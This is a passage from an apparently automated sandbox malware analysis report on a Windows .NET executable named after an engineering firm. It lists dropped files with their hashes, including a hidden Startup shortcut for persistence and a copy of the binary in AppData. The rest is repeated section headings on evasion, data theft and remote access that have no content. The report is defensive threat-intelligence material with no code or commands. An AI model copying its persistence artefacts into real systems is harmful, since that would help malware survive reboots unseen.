C:\Users\user\AppData\Local\Temp\Log.tmp	Generic INItialization configuration [WIN]	5362ACB758D5B0134C33D457FCC002D9	BC56DFFBE17C015DB6676CF56996E29DF426AB92	13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ew04031.law.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yxebe5j.g1k.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1kkwmex.kdj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5jfgk3a.q4t.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkgarccn.ioz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpb5ezlb.ysp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzs115o5.hoc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0iehe5c.4dv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5lurcm3.c5a.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cz0l5p2n.qac.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ean0vdtf.cj0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejpbso42.ox5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jasetlow.33p.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l01lomss.d32.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjd0u0bu.ogr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sshyzuwv.2ym.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uglp4bwk.rkm.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzxixvx3.t3m.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh5iqusp.cvx.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuahbm3e.mei.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmp2E66.tmp	XML 1.0 document, ASCII text	AF0C00DEA3136F47ECD0634C9538B4C4	FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B	0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
C:\Users\user\AppData\Local\Temp\tmp960E.tmp	XML 1.0 document, ASCII text	AF0C00DEA3136F47ECD0634C9538B4C4	FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B	0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp	XML 1.0 document, ASCII text	AF0C00DEA3136F47ECD0634C9538B4C4	FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B	0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
C:\Users\user\AppData\Local\Temp\tmpE6A.tmp	XML 1.0 document, ASCII text	AF0C00DEA3136F47ECD0634C9538B4C4	FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B	0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 31 08:31:24 2024, mtime=Thu Oct 31 08:31:25 2024, atime=Thu Oct 31 08:31:25 2024, length=575496, window=hide	64D46B8CC371AF7F92D323E0A91119E4	3338DB5C22FEBADCB4F2D32A1CE0E7CABCE3879F	C57727433577BC090FBFB8FCB2263768A27CE8784FE738BCB5164B2C411AA5D6
C:\Users\user\AppData\Roaming\RTUZKYTc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	FF9E45D7326698F34526793BF1244811	B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A	4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA
C:\Users\user\AppData\Roaming\RTUZKYTc.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	FF9E45D7326698F34526793BF1244811	B3FF69ABFE1C5E6633A866FFBEBE2139A69E3F0A	4DB566FCDC413FE50153DC8431AE86192241F0E1E86071F80D42EB6E0FB5BACA

Windows Analysis Report
SS Bottmac Engineers Pvt. Ltd..exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report SS Bottmac Engineers Pvt. Ltd..exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SS Bottmac Engineers Pvt. Ltd..exe

Malware Threat Intel
Provided by